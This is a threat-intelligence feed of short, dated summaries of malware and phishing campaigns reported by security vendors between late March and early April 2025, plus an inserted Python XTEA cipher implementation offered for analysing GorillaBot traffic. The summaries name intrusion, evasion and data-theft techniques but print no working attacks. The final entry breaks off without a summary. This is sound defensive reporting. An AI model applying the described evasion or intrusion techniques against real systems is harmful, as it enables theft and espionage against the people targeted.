ASEC researchers have observed threat actors impersonating a recruitment email from Dev.to to distribute malware, including BeaverTail and the "car.dll" downloader. The malicious project was shared via a BitBucket link, and the victim discovered the harmful code, which was then disclosed to the community. While the link is no longer active, analysis of files on VirusTotal confirmed that BeaverTail, used by North Korean attackers for data theft, was involved. The "car.dll" downloader, which executes Windows commands internally, shares similarities with LightlessCan malware linked to the Lazarus group.
Source: https://asec.ahnlab.com/en/87299/
2025-04-04
TookPS_Downloader
LOW
+
Intel Source:
Securelist
Intel Name:
TookPS_Downloader
Date of Scan:
2025-04-04
Impact:
LOW
Summary:
Securelist researchers have observed that cybercriminals have been using lures for various software to trick users into downloading malware. Initially they used DeepSeek, but later moved on to other software such as UltraViewer, AutoCAD, SketchUp, Ableton and Quicken. The attackers create fraudulent websites that appear legitimate and offer free downloads of these applications. Once a victim downloads and installs the application, a downloader called TookPS contacts a remote C2 server to retrieve a series of PowerShell scripts. These scripts install an SSH server that allows attackers to secretly access the victim’s system. Additionally, the malware downloads TeviRat, a backdoor that uses DLL sideloading to manipulate TeamViewer, giving attackers hidden remote control. The attackers’ goal is to gain access to compromised devices, potentially leading to data theft, espionage or further malicious activity.
Source: https://securelist.com/tookps/116019/
2025-04-04
Analyzing_New_HijackLoader_Evasion_Tactics
MEDIUM
+
Intel Source:
Zscaler
Intel Name:
Analyzing_New_HijackLoader_Evasion_Tactics
Date of Scan:
2025-04-04
Impact:
MEDIUM
Summary:
Zscaler ThreatLabz reports ongoing development and enhancement of HijackLoader, a modular malware downloader first identified in 2023, designed to deliver second-stage payloads while evading security controls. Recent updates introduce new modules focused specifically on advanced evasion and persistence. Key techniques now include call stack spoofing to mask the origin of malicious API calls by manipulating stack frames, anti-virtual machine checks to detect analysis environments, and establishing persistence via scheduled tasks configured through dedicated modules. HijackLoader continues to leverage established methods like direct syscall execution via Heaven's Gate, process blocklisting, and storing encrypted modules within PNG files, now sometimes using the pixel structure itself. The primary objective appears to be stealthy payload delivery and maintaining access.
Source: https://www.zscaler.com/blogs/security-research/analyzing-new-hijackloader-evasion-tactics
2025-04-03
Fileless_Cryptominer_Targets_Exposed_PostgreSQL
LOW
+
Intel Source:
Wiz
Intel Name:
Fileless_Cryptominer_Targets_Exposed_PostgreSQL
Date of Scan:
2025-04-03
Impact:
LOW
Summary:
Wiz researchers have discovered a new variant of an ongoing campaign targeting misconfigured and publicly exposed PostgreSQL servers. The threat actor, identified as JINX-0126, exploits weak login credentials to access vulnerable servers and deploy XMRig-C3 cryptominers. The actor assigns a unique mining worker to each victim, and analysis reveals three linked wallets, affecting over 1,500 victims. The research highlights the prevalence of misconfigured PostgreSQL instances, with nearly 90% of cloud environments hosting PostgreSQL, and one-third having at least one publicly exposed instance, making them prime targets for opportunistic attacks.
Source: https://www.wiz.io/blog/postgresql-cryptomining
2025-04-03
Emmenhtal_Unleashes_SmokeLoader_Malware
MEDIUM
+
Intel Source:
G Data
Intel Name:
Emmenhtal_Unleashes_SmokeLoader_Malware
Date of Scan:
2025-04-03
Impact:
MEDIUM
Summary:
Researchers at GDATA have identified a malicious campaign targeting First Ukrainian International Bank (pumb[.]ua), involving a stealthy malware loader called Emmenhtal (a slightly unconventional spelling referring to its HTA component, sometimes also known as Peaklight). This loader, active since early 2024, is primarily used by financially motivated attackers to deliver commodity infostealers like CryptBot and Lumma. In this campaign, Emmenhtal has been seen working in tandem with SmokeLoader malware, taking advantage of its modular nature to dynamically deploy additional malicious payloads.
Source: https://www.gdatasoftware.com/blog/2025/03/38160-emmenhtal-smokeloader-malware
2025-04-03
Outlaw_Malware
MEDIUM
+
Intel Source:
Elastic Security Labs
Intel Name:
Outlaw_Malware
Date of Scan:
2025-04-03
Impact:
MEDIUM
Summary:
Elastic Security Labs researchers have observed Outlaw, a Linux-based, persistent but unsophisticated malware primarily targeting cloud and IoT environments. Despite its lack of advanced evasion techniques, Outlaw remains effective by using simple methods like SSH brute-forcing, SSH key manipulation, cron-based persistence, and modified coin miners. It spreads through worm-like propagation, using compromised hosts to launch further attacks. A honeypot deployment revealed real-time operator actions, offering valuable insights into their methods.
Source: https://www.elastic.co/security-labs/outlaw-linux-malware
2025-04-02
KoiLoader_Attack_Exfiltrates_Data_via_Shortcut
LOW
+
Intel Source:
eSentire
Intel Name:
KoiLoader_Attack_Exfiltrates_Data_via_Shortcut
Date of Scan:
2025-04-02
Impact:
LOW
Summary:
eSentire researchers have uncovered a multi-stage malware attack initiated by a malicious shortcut file ("chase_statement_march.lnk"). The attack begins with a spam email containing a zip file that exploits a Windows vulnerability to hide a harmful command in the shortcut properties. This triggers the download of JScript files, disables security defenses via PowerShell, and establishes persistence. The attack employs KoiLoader to unpack encrypted payloads, use UAC bypass techniques, and evade detection. Koi Stealer is then deployed to exfiltrate sensitive information, with the malware communicating with its C2 server using encrypted requests.
Source: https://www.esentire.com/blog/the-long-and-shortcut-of-it-koiloader-analysis
2025-04-02
FamousSparrow_Group_Targeting_US_and_Mexico
MEDIUM
+
Intel Source:
Welivesecurity
Intel Name:
FamousSparrow_Group_Targeting_US_and_Mexico
Date of Scan:
2025-04-02
Impact:
MEDIUM
Summary:
ESET researchers have discovered that the FamousSparrow APT group compromised a U.S. financial sector trade group and a research institute in Mexico. The group deployed two new, undocumented versions of the SparrowDoor backdoor, including a modular variant, which improve upon previous versions by enabling parallelized commands. Additionally, FamousSparrow was observed using the ShadowPad backdoor for the first time.
Source: https://www.welivesecurity.com/en/eset-research/you-will-always-remember-this-as-the-day-you-finally-caught-famoussparrow/
2025-04-02
RESURGE_Malware
MEDIUM
+
Intel Source:
CISA
Intel Name:
RESURGE_Malware
Date of Scan:
2025-04-02
Impact:
MEDIUM
Summary:
CISA analyzed malware designated RESURGE, recovered from a critical infrastructure organization's Ivanti Connect Secure device following exploitation of CVE-2025-0282 for initial access, as detailed in their March 28, 2025 report. RESURGE, exhibiting similarities to SPAWNCHIMERA, establishes a Secure Shell (SSH) tunnel for command and control (C2), modifies files, bypasses integrity checks, and deploys a web shell onto the Ivanti boot disk for persistence. The malware suite also includes a SPAWNSLOTH variant for log tampering and a custom binary leveraging BusyBox applets to extract kernel images and execute additional payloads, indicating defense evasion and information gathering objectives. This activity represents a significant threat due to the compromise of secure access appliances within critical infrastructure, potentially enabling attackers to gain persistent network access, execute arbitrary commands, and manipulate device integrity.
Source: https://www.cisa.gov/news-events/analysis-reports/ar25-087a
2025-04-01
RedCurl_Adopts_QWCrypt_Ransomware
LOW
+
Intel Source:
Bitdefender
Intel Name:
RedCurl_Adopts_QWCrypt_Ransomware
Date of Scan:
2025-04-01
Impact:
LOW
Summary:
Researchers at Bitdefender Labs have revealed that the RedCurl hacking group, previously known for stealthily collecting data, is now deploying ransomware. The group developed a previously unseen ransomware named QWCrypt. Unlike most ransomware gangs, RedCurl appears to function differently, possibly as cyber mercenaries or as a group that prefers private negotiations over public ransom demands.
Source: https://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive
2025-04-01
CoffeeLoader_Malware
MEDIUM
+
Intel Source:
Zscaler
Intel Name:
CoffeeLoader_Malware
Date of Scan:
2025-04-01
Impact:
MEDIUM
Summary:
Zscaler ThreatLabz has identified a new malware called CoffeeLoader that first emerged in September 2024. The main objective of this malware is to download and execute additional malware while evading detection by security products. It uses advanced techniques such as call stack spoofing, sleep obfuscation, and Windows fibers for stealth. It comes with a unique packer called Armoury that executes code on the GPU (graphics processing unit) instead of the CPU. Additionally, researchers observed that CoffeeLoader is delivered through SmokeLoader and is being used to deploy Rhadamanthys.
Source: https://www.zscaler.com/blogs/security-research/coffeeloader-brew-stealthy-techniques
2025-04-01
ReaderUpdate_Loader_Targeting_MacOS
LOW
+
Intel Source:
SentinelOne
Intel Name:
ReaderUpdate_Loader_Targeting_MacOS
Date of Scan:
2025-04-01
Impact:
LOW
Summary:
SentinelOne researchers have identified a malware loader called ReaderUpdate, targeting macOS systems, that has been active since 2020. Initially it was used to deliver Genieo adware, also known as DOLITTLE, but it re-emerged in 2024 with new variants written in multiple languages such as Crystal, Nim, and Rust. The most recent version is written in Go. When the malware executes, it collects hardware details of the compromised macOS system using a built-in system command, generates a unique ID for the device, and sends it to a remote server controlled by the attackers.
Source: https://www.sentinelone.com/blog/readerupdate-reforged-melting-pot-of-macos-malware-adds-go-to-crystal-nim-and-rust-variants/
2025-03-31
Phishing_Campaign_Delivers_Xworm_RAT
LOW
+
Intel Source:
ASEC
Intel Name:
Phishing_Campaign_Delivers_Xworm_RAT
Date of Scan:
2025-03-31
Impact:
LOW
Summary:
Researchers from ASEC have discovered a phishing campaign distributing GuLoader malware through phishing emails impersonating a well-known shipping company. These emails trick recipients into checking customs clearance tax details and executing the attached file. The attachment contains an obfuscated VBScript which, when executed, runs a hidden PowerShell script and downloads additional malicious files from external sources. The scripts also create a registry key with a random name to maintain persistence on the compromised system. The malware launches msiexec[.]exe and injects the Xworm RAT into it.
Source: https://asec.ahnlab.com/ko/86973/
2025-03-31
Fake_US_ESTA_Emails
LOW
+
Intel Source:
Cofense
Intel Name:
Fake_US_ESTA_Emails
Date of Scan:
2025-03-31
Impact:
LOW
Summary:
Cofense researchers have observed that cybercriminals are taking advantage of recent uncertainty and confusion related to U.S. immigration by sending fake emails impersonating U.S. Customs and Border Protection. The emails contain a link and claim that the recipient needs to submit a new Electronic System for Travel Authorization (ESTA) application. If the recipient clicks on the link, it redirects to a deceptive website that mimics the official ESTA application portal to trick users into providing sensitive personal information such as passport details, home address, social media accounts, and employment history.
Source: https://cofense.com/blog/decoding-fake-us-esta-emails-scam-or-real-deal
2025-03-31
Gemelli_Hospital_of_Rome_Targeted_by_Malicious_Actors
LOW
+
Intel Source:
CERT-AGID
Intel Name:
Gemelli_Hospital_of_Rome_Targeted_by_Malicious_Actors
Date of Scan:
2025-03-31
Impact:
LOW
Summary:
CERT-AGID has identified a phishing campaign targeting employees of Agostino Gemelli University Hospital to steal their login credentials. The attackers send fake security emails with the subject line "Notice of Unauthorized Access to Your Account", impersonating the hospital’s IT security team. The email claims that someone from Pyongyang, North Korea has accessed the employee’s account and urges them to verify their account login. When an employee clicks on the link, they are redirected to a fake login page. After entering their credentials and clicking the login button, their credentials are stolen by the attackers.
Source: https://cert-agid.gov.it/news/policlinico-gemelli-di-roma-preso-di-mira-da-attori-malevoli/
2025-03-31
Malicious_NPM_Packages_Deliver_Reverse_Shell
LOW
+
Intel Source:
Reversinglabs
Intel Name:
Malicious_NPM_Packages_Deliver_Reverse_Shell
Date of Scan:
2025-03-31
Impact:
LOW
Summary:
Researchers at ReversingLabs have discovered two suspicious software packages on npm called ethers-provider2 and ethers-providerz. These packages act as downloaders that modify the legitimate npm package ethers by inserting malicious code into it and create a connection to the attackers that gives them full remote control of the compromised machine. When the package is installed, it executes a script that fetches second-stage malware, which checks for the ethers package. If found, it replaces a core file with a malicious version that downloads and executes a third-stage payload. This payload establishes a reverse shell and creates a file (loader[.]js) to ensure the malicious patch remains active.
Source: https://www.reversinglabs.com/blog/malicious-npm-patch-delivers-reverse-shell
2025-03-30
Hunter_International_Ransomware_Group
MEDIUM
+
Intel Source:
Esentire
Intel Name:
Hunter_International_Ransomware_Group
Date of Scan:
2025-03-30
Impact:
MEDIUM
Summary:
Researchers at eSentire have uncovered a ransomware attack on a retail company. The attack is linked to Hunters International, which emerged in 2023. This group bought the ransomware code from Hive and is believed to operate as a standalone group with its own infrastructure. The attackers gained initial access by exploiting vulnerability CVE-2024-55591 in FortiOS and FortiProxy, which allowed them to bypass authentication. They used the VPN and RDP to move laterally within the network. After gaining access, the attackers conducted reconnaissance, created new user accounts and exfiltrated data using Rclone before switching to WinSCP. After exfiltration, the group deployed Hunters International ransomware to encrypt files across the network and demand a ransom payment.
Source: https://www.esentire.com/blog/from-access-to-encryption-dissecting-hunters-internationals-latest-ransomware-attack
2025-03-30
Semrush_Impersonation_Scam_in_Google_Ads
LOW
+
Intel Source:
Malwarebytes
Intel Name:
Semrush_Impersonation_Scam_in_Google_Ads
Date of Scan:
2025-03-30
Impact:
LOW
Summary:
Researchers from Malwarebytes have found a Semrush impersonation fraud that targets Google Ads users. Cybercriminals are using malicious advertising to send victims to fraudulent Semrush login pages, where only the "Log in with Google" option is enabled, deceiving visitors into disclosing their Google login information. The attackers initially used Google Ads to target Google accounts, but they have since switched to impersonating Semrush entirely. To add credibility to the fraud, the attackers registered domains that resemble Semrush.
Source: https://www.malwarebytes.com/blog/news/2025/03/semrush-impersonation-scam-hits-google-ads
2025-03-30
SvcStealer_Malware_Campaign
LOW
+
Intel Source:
Seqrite
Intel Name:
SvcStealer_Malware_Campaign
Date of Scan:
2025-03-30
Impact:
LOW
Summary:
Seqrite researchers have identified a new strain of info stealer called SvcStealer that first emerged in January 2025. This malware is distributed through phishing emails with malicious attachments. It is capable of stealing sensitive information such as system details, installed programs, user credentials, cryptocurrency wallets, messaging app data, and browser data. It then sends the stolen data to the attacker’s C2 server. Additionally, cybercriminals may sell the stolen data on underground forums and illegal marketplaces.
Source: https://www.seqrite.com/blog/svc-new-stealer-on-the-horizon/
2025-03-30
FizzBuzz_to_FogDoor
LOW
+
Intel Source:
Cyble
Intel Name:
FizzBuzz_to_FogDoor
Date of Scan:
2025-03-30
Impact:
LOW
Summary:
Cyble researchers have uncovered a campaign in which attackers target Polish-speaking developers with a coding challenge on GitHub. They create a deceptive job recruitment test called FizzBuzz to trick victims into downloading an ISO file that contains a JavaScript file along with a malicious LNK file. When the file is executed, it runs a PowerShell script that installs a backdoor called FogDoor. The malware communicates through a social media platform via the Dead Drop Resolver (DDR) technique and exfiltrates sensitive information such as browser cookies, saved passwords, installed applications and file details. Additionally, researchers have discovered that a GitHub repository is now distributing an invoice-themed LNK file named faktura_2025.pdf.lnk which uses the same FogDoor backdoor and attack infrastructure.
Source: https://cyble.com/blog/fake-coding-challenges-steal-sensitive-data-via-fogdoor/
2025-03-29
Malware_Campaigns_Exploit_DeepSeek_Hype
LOW
+
Intel Source:
Mcafee
Intel Name:
Malware_Campaigns_Exploit_DeepSeek_Hype
Date of Scan:
2025-03-29
Impact:
LOW
Summary:
Researchers at McAfee have detected an increase in malware activities that exploit the buzz around DeepSeek AI to target unwary users. Cybercriminals are using trendy search phrases and SEO poisoning techniques to increase the prominence of rogue websites, a common tactic used to transmit malware. The recent release of the DeepSeek-R1 model and associated chatbot app, which immediately gained popularity, provided a chance for scammers to fool customers by distributing counterfeit DeepSeek software, fake websites, and fraudulent mobile apps.
Source: https://www.mcafee.com/blogs/internet-security/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware/
2025-03-29
UAT_5918_Targets_Critical_Infrastructure_Entities_in_Taiwan
MEDIUM
+
Intel Source:
Cisco Talos
Intel Name:
UAT_5918_Targets_Critical_Infrastructure_Entities_in_Taiwan
Date of Scan:
2025-03-29
Impact:
MEDIUM
Summary:
Researchers at Cisco Talos uncovered a cyber espionage campaign conducted by a threat group called UAT-5918 which has been active since 2023. This group primarily targets organisations in Taiwan, focusing on industries such as telecommunications, healthcare, IT and critical infrastructure. The group’s main goal is to establish long-term access to victim networks to harvest sensitive information and credentials. UAT-5918 gains access by exploiting unpatched vulnerabilities in web and application servers and relies on open-source tools which include FRPC, FScan, In-Swor, Earthworm, and Neo-reGeorg for network reconnaissance, lateral movement and persistence.
Source: https://blog.talosintelligence.com/uat-5918-targets-critical-infra-in-taiwan/
2025-03-29
Jupyter_Notebooks_Targeted_by_Cryptominer
LOW
+
Intel Source:
Cado Security
Intel Name:
Jupyter_Notebooks_Targeted_by_Cryptominer
Date of Scan:
2025-03-29
Impact:
LOW
Summary:
Cado Security Labs have discovered a new cryptomining campaign targeting misconfigured Jupyter Notebooks. These interactive Python environments, typically used by data scientists, are being exploited to deliver a cryptominer. The attack, detected through Cado Labs' honeypots, involves retrieving a bash script and a Microsoft Installer (MSI) file. After extracting the MSI file, it executes a custom action that points to a malicious executable named "Binary.freedllBinary," potentially compromising both Windows and Linux systems.
Source: https://www.cadosecurity.com/blog/jupyter-notebooks-cryptominer
2025-03-28
RustDoor_and_Koi_Stealer_Campaign
LOW
+
Intel Source:
Palo Alto
Intel Name:
RustDoor_and_Koi_Stealer_Campaign
Date of Scan:
2025-03-28
Impact:
LOW
Summary:
Palo Alto researchers have uncovered RustDoor, a Rust-based macOS malware posing as a legitimate software update, along with a new variant of Koi Stealer. The malware uses rare evasion techniques to avoid detection. Additionally, suspected North Korean threat actors are behind a campaign called Contagious Interview, where attackers impersonate recruiters to trick job seekers into installing malware disguised as legitimate development software, primarily targeting the tech industry.
Source: https://unit42.paloaltonetworks.com/macos-malware-targets-crypto-sector/
2025-03-28
Evolving_Raspberry_Robin_Attack_Strategies
LOW
+
Intel Source:
Silent Push
Intel Name:
Evolving_Raspberry_Robin_Attack_Strategies
Date of Scan:
2025-03-28
Impact:
LOW
Summary:
Researchers at Silent Push have uncovered approximately 200 unique Raspberry Robin command and control domains through analyzing key nameservers, domain naming conventions, and IP diversity patterns. Their partnership with Team Cymru resulted in updated 2024 NetFlow data, indicating a single IP address that connects Raspberry Robin's C2 infrastructure.
Source: https://www.silentpush.com/blog/raspberry-robin/
2025-03-28
New_Steganography_Malware_Campaign
LOW
+
Intel Source:
Seqrite
Intel Name:
New_Steganography_Malware_Campaign
Date of Scan:
2025-03-28
Impact:
LOW
Summary:
Researchers at Seqrite have observed a campaign involving a complex infection chain, starting with a phishing email containing an Excel file that exploits a vulnerability to download an HTA file. This file executes VBScript, which creates a batch file to download an obfuscated VBScript from a paste URL. The script then decodes a base64-encoded malicious payload hidden in a JPG image. The payload is executed via a function called VAI, which retrieves a second-stage payload through a reversed base64-encoded file. This campaign, though inactive recently, is notable for its steganographic use of base64 encoding within images to distribute malware.
Source: https://www.seqrite.com/blog/steganographic-campaign-distributing-malware/
2025-03-28
MoDiRAT_Targets_France_via_Horus_Protector
MEDIUM
+
Intel Source:
Sonicwall
Intel Name:
MoDiRAT_Targets_France_via_Horus_Protector
Date of Scan:
2025-03-28
Impact:
MEDIUM
Summary:
SonicWall researchers have discovered a new evolution in the Horus Protector distributed infection chain, which is currently targeting the French region. The malware, MoDiRAT, is known for stealing credit card and personal information. During the infection process, it deploys the DarkCloud stealer, but before exiting, the loader checks if the victim is located in France. If confirmed, the victim's machine is further infected with MoDiRAT.
Source: https://www.sonicwall.com/blog/modirat-malware-uses-horus-protector-to-target-france
2025-03-27
APT_Attack_Uses_Chrome_Zero_Day
LOW
+
Intel Source:
Securelist
Intel Name:
APT_Attack_Uses_Chrome_Zero_Day
Date of Scan:
2025-03-27
Impact:
LOW
Summary:
Researchers at Securelist have identified Operation ForumTroll, an advanced APT attack that exploits a zero-day vulnerability (CVE-2025-2783) in Google Chrome. This vulnerability enables attackers to escape Chrome's sandbox by exploiting a logical defect at the boundary between the browser and the Windows OS. The attack targeted Russian media and educational organizations with phishing emails imitating invitations to the "Primakov Readings" forum.
Source: https://securelist.com/operation-forumtroll/115989/
2025-03-27
The_Mysterious_Case_of_PlayBoy_Locker
MEDIUM
+
Intel Source:
Cybereason
Intel Name:
The_Mysterious_Case_of_PlayBoy_Locker
Date of Scan:
2025-03-27
Impact:
MEDIUM
Summary:
Cybereason researchers have investigated the PlayBoy Locker Ransomware-as-a-Service (RaaS), which provides unskilled cybercriminals with a comprehensive toolkit to launch ransomware attacks. The platform offers customizations for targeting Windows, NAS, and ESXi systems, along with frequent updates, anti-detection features, and customer support. Since its emergence in September 2024, PlayBoy Locker has operated on an affiliate model, splitting ransom payments 85/15 with affiliates.
Source: https://www.cybereason.com/blog/threat-analysis-playboy-locker
2025-03-27
SectopRAT_Targets_Window_Users
LOW
+
Intel Source:
Inde
Intel Name:
SectopRAT_Targets_Window_Users
Date of Scan:
2025-03-27
Impact:
LOW
Summary:
SectopRAT is a newly discovered malware that targets Windows users by disguising itself as a Cloudflare Turnstile CAPTCHA challenge. When users complete the verification process, the malware is downloaded onto their system while a normal-looking website is displayed. SectopRAT is distributed through malvertising campaigns and drive-by downloads of illegitimate software. The infection starts with a JavaScript-based loader that profiles the system environment and then downloads further malicious files over encrypted connections; these execute a PowerShell command to gain persistence and deliver the SectopRAT payload, which steals sensitive user data such as passwords, financial details and cryptocurrency wallets.
Source: https://www.inde.nz/blog/i-am-not-a-robot
2025-03-26
APT36_Targets_India_via_Fake_IndiaPost
LOW
+
Intel Source:
Cyfirma
Intel Name:
APT36_Targets_India_via_Fake_IndiaPost
Date of Scan:
2025-03-26
Impact:
LOW
Summary:
Researchers from CYFIRMA have discovered a Pakistan-based APT group known as APT36, assessed with medium confidence to be exploiting Pakistan's Prime Minister Youth Laptop Scheme to target Indian users. The group constructed a fake IndiaPost website that serves a malicious PDF to Windows users and instructs them to run a PowerShell command, while mobile users receive a trojanized APK masquerading as an IndiaPost app.
Source: https://www.cyfirma.com/research/turning-aid-into-attack-exploitation-of-pakistans-youth-laptop-scheme-to-target-india/
2025-03-26
SnakeKeylogger_Multi_Stage_Attack_Observed
MEDIUM
+
Intel Source:
Seqrite
Intel Name:
SnakeKeylogger_Multi_Stage_Attack_Observed
Date of Scan:
2025-03-26
Impact:
MEDIUM
Summary:
Researchers from Seqrite Labs have discovered a multi-stage malware operation that delivers SnakeKeylogger, a credential-stealing information stealer, via malicious spam emails. The attack starts with an .img file attachment that, when opened, mounts a virtual drive containing a disguised executable posing as a PDF document. This downloader obtains an encoded payload from a remote Apache server, which is then decrypted and executed in memory to avoid detection. SnakeKeylogger then collects sensitive data such as email addresses, browser-stored passwords, and FTP login information.
Source: https://www.seqrite.com/blog/snakekeylogger-a-multistage-info-stealer-malware-campaign/
2025-03-26
Kimsuky_Latest_Cyberattack
MEDIUM
+
Intel Source:
K7 Labs
Intel Name:
Kimsuky_Latest_Cyberattack
Date of Scan:
2025-03-26
Impact:
MEDIUM
Summary:
Researchers at K7 Labs have identified a cyberattack linked to the North Korean state-sponsored group Kimsuky, aka Black Banshee, known for cyber espionage and data theft. The attack involves a zip file containing four additional files: a VBScript, a PowerShell script and two encoded text files. When these files are executed, they collect the system’s BIOS serial number, create a unique directory in the temp folder to store attack-related files, and check for a virtual machine environment. If one is detected, the malware deletes all files associated with the attack. Additionally, the malware includes functions for stealing sensitive data, extracting cryptocurrency wallet information and establishing communication with the C2 server.
Source: https://labs.k7computing.com/index.php/inside-kimsukys-latest-cyberattack-analyzing-malicious-scripts-and-payloads/
2025-03-26
Technical_Analysis_of_GorillaBot
LOW
+
Intel Source:
ANY.RUN
Intel Name:
Technical_Analysis_of_GorillaBot
Date of Scan:
2025-03-26
Impact:
LOW
Summary:
GorillaBot is a newly discovered Mirai-based botnet that has been actively targeting systems across over 100 countries, issuing over 300,000 attack commands between September 4 and 27. It affects various industries, including telecommunications, finance, and education. The botnet uses custom encryption, evasion techniques, and secure C2 communication via raw TCP sockets and an XTEA-like cipher. It includes anti-debugging measures and authenticates with a SHA-256-based token. GorillaBot’s attack commands are encoded, hashed, and executed using a Mirai-style function.
Source: https://any.run/cybersecurity-blog/gorillabot-malware-analysis/
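The entry above describes C2 traffic protected by an "XTEA-like" cipher. The block below is an added reference implementation of standard XTEA (Needham and Wheeler's 64-round/32-cycle variant) in Python, not GorillaBot's code and not taken from the ANY.RUN write-up; it is the baseline an analyst would start from when checking whether captured traffic decrypts under a recovered key. The sample key, the plaintext, the little-endian word order and the ECB block handling are all assumptions made for the example.

```python
import struct

DELTA = 0x9E3779B9
MASK = 0xFFFFFFFF


def _mix(v: int) -> int:
    # XTEA round function on one half-block, truncated to 32 bits as C's uint32 would be.
    return ((((v << 4) & MASK) ^ (v >> 5)) + v) & MASK


def xtea_encrypt_block(v0: int, v1: int, key: tuple, rounds: int = 32) -> tuple:
    """Encrypt one 64-bit block (two uint32 halves) under a 4 x uint32 key."""
    s = 0
    for _ in range(rounds):
        v0 = (v0 + (_mix(v1) ^ ((s + key[s & 3]) & MASK))) & MASK
        s = (s + DELTA) & MASK
        v1 = (v1 + (_mix(v0) ^ ((s + key[(s >> 11) & 3]) & MASK))) & MASK
    return v0, v1


def xtea_decrypt_block(v0: int, v1: int, key: tuple, rounds: int = 32) -> tuple:
    """Invert xtea_encrypt_block by running the sum schedule backwards from rounds * DELTA."""
    s = (DELTA * rounds) & MASK
    for _ in range(rounds):
        v1 = (v1 - (_mix(v0) ^ ((s + key[(s >> 11) & 3]) & MASK))) & MASK
        s = (s - DELTA) & MASK
        v0 = (v0 - (_mix(v1) ^ ((s + key[s & 3]) & MASK))) & MASK
    return v0, v1


def key_words(key: bytes) -> tuple:
    """Split a 16-byte key into four uint32 words; little-endian order is an assumption here."""
    if len(key) != 16:
        raise ValueError("XTEA needs a 128-bit key")
    return struct.unpack("<4I", key)


def xtea_ecb(data: bytes, key: bytes, encrypt: bool) -> bytes:
    """Apply XTEA block by block (ECB, for illustration only; a real channel would chain blocks or add nonces)."""
    if len(data) % 8:
        raise ValueError("data must be a multiple of 8 bytes")
    k = key_words(key)
    fn = xtea_encrypt_block if encrypt else xtea_decrypt_block
    out = bytearray()
    for i in range(0, len(data), 8):
        v0, v1 = struct.unpack("<2I", data[i:i + 8])
        out += struct.pack("<2I", *fn(v0, v1, k))
    return bytes(out)


# Constructed sample: a made-up key and a 16-byte command string, not GorillaBot material.
SAMPLE_KEY = bytes(range(16))
SAMPLE_PLAINTEXT = b"ATTACK 10.0.0.1 "

if __name__ == "__main__":
    ct = xtea_ecb(SAMPLE_PLAINTEXT, SAMPLE_KEY, encrypt=True)
    print(ct.hex())
    print(xtea_ecb(ct, SAMPLE_KEY, encrypt=False))
```

When a sample's cipher only resembles XTEA, the places to look for deviations are the constant DELTA, the number of rounds, the key-word selection (`s & 3` and `(s >> 11) & 3`) and the byte order used when the C2 code packs words; each of those is a one-line change in the functions above.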
2025-03-25
Weaver_Ant_China_Nexus_Web_Shell_Attacks
LOW
+
Intel Source:
Sygnia
Intel Name:
Weaver_Ant_China_Nexus_Web_Shell_Attacks
Date of Scan:
2025-03-25
Impact:
LOW
Summary:
Researchers at Sygnia have uncovered a Chinese-nexus threat actor known as Weaver Ant infiltrating a major Asian telecommunications company. The attackers used web shells, including an encrypted version of China Chopper and a previously unknown 'INMemory' web shell, to sustain persistence and aid cyber espionage.
Source: https://www.sygnia.co/threat-reports-and-advisories/weaver-ant-tracking-a-china-nexus-cyber-espionage-operation/
2025-03-25
INDOHAXSEC_Rising_Indonesian_Hackers
LOW
+
Intel Source:
Arctic Wolf
Intel Name:
INDOHAXSEC_Rising_Indonesian_Hackers
Date of Scan:
2025-03-25
Impact:
LOW
Summary:
Arctic Wolf researchers have identified that the Indonesian-based hacktivist collective INDOHAXSEC has been active in Southeast Asia, conducting cyberattacks such as DDoS and ransomware attacks against various entities, including government bodies. Motivated primarily by political goals, with occasional financial motives, the group uses both custom and publicly available hacking tools. They maintain a strong online presence on platforms like GitHub, Telegram, and social media, seemingly prioritizing notoriety over operational security.
Source: https://arcticwolf.com/resources/blog/indohaxsec-emerging-indonesian-hacking-collective/
2025-03-25
FishMedley_Cyberattack_Identified
MEDIUM
+
Intel Source:
ESET Research
Intel Name:
FishMedley_Cyberattack_Identified
Date of Scan:
2025-03-25
Impact:
MEDIUM
Summary:
Researchers from ESET have observed Operation FishMedley, a global espionage operation carried out by the FishMonger APT group, which is linked to the Chinese contractor I-SOON. The campaign targeted governments, NGOs and think tanks in Asia, Europe and the United States using implants including ShadowPad, SodaMaster and Spyder, tools usually associated with China-aligned threat actors.
Source: https://www.welivesecurity.com/en/eset-research/operation-fishmedley/
2025-03-24
Python_Based_AnubisBackdoor_Found
LOW
+
Intel Source:
G DATA
Intel Name:
Python_Based_AnubisBackdoor_Found
Date of Scan:
2025-03-24
Impact:
LOW
Summary:
Researchers at G Data have found a new Python-based backdoor known as "AnubisBackdoor," which was used by the financially motivated threat group FIN7 during recent attacks. To avoid detection, the malware, which is delivered by phishing emails containing ZIP archives, uses various layers of obfuscation and encryption. Initially, the malware employs AES-encrypted Python scripts to execute payloads invisibly, reducing forensic traces.
Source: https://www.gdatasoftware.com/blog/2025/03/38161-analysis-fin7-anubis-backdoor
2025-03-24
ABYSSWORKER_Driver_in_Medusa_Attacks
LOW
+
Intel Source:
Elastic Security Labs
Intel Name:
ABYSSWORKER_Driver_in_Medusa_Attacks
Date of Scan:
2025-03-24
Impact:
LOW
Summary:
Researchers at Elastic Security Labs have discovered ABYSSWORKER, a malicious driver distributed alongside MEDUSA ransomware and used to disable endpoint detection and response (EDR) products. Attackers bring either vulnerable legitimate drivers or custom-built drivers to evade detection. In this case, a HEARTCRYPT-packed loader installed the ABYSSWORKER driver, which was signed with a revoked certificate from a Chinese vendor and used to blind the products of numerous EDR vendors.
Source: https://www.elastic.co/security-labs/abyssworker
2025-03-24
Mirai_Botnet_Targets_DrayTek_Routers
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Mirai_Botnet_Targets_DrayTek_Routers
Date of Scan:
2025-03-24
Impact:
LOW
Summary:
Researchers at ISC.SANS have observed that the Mirai botnet now includes exploits targeting DrayTek Vigor routers. These attacks are based on vulnerabilities published by Forescout in October, which initially affected around 700,000 devices. Attackers are primarily targeting the "mainfunction.cgi" and "keyPath" vulnerabilities, with continued attempts to exploit "cvmcfgupload". Some attack attempts appear to be malformed, perhaps due to errors in the exploit scripts.
Source: https://isc.sans.edu/diary/Mirai+Bot+now+incroporating+malformed+DrayTek+Vigor+Router+Exploits/31770/
2025-03-24
Malicious_HWP_Disguised_as_Education_Application
LOW
+
Intel Source:
ASEC
Intel Name:
Malicious_HWP_Disguised_as_Education_Application
Date of Scan:
2025-03-24
Impact:
LOW
Summary:
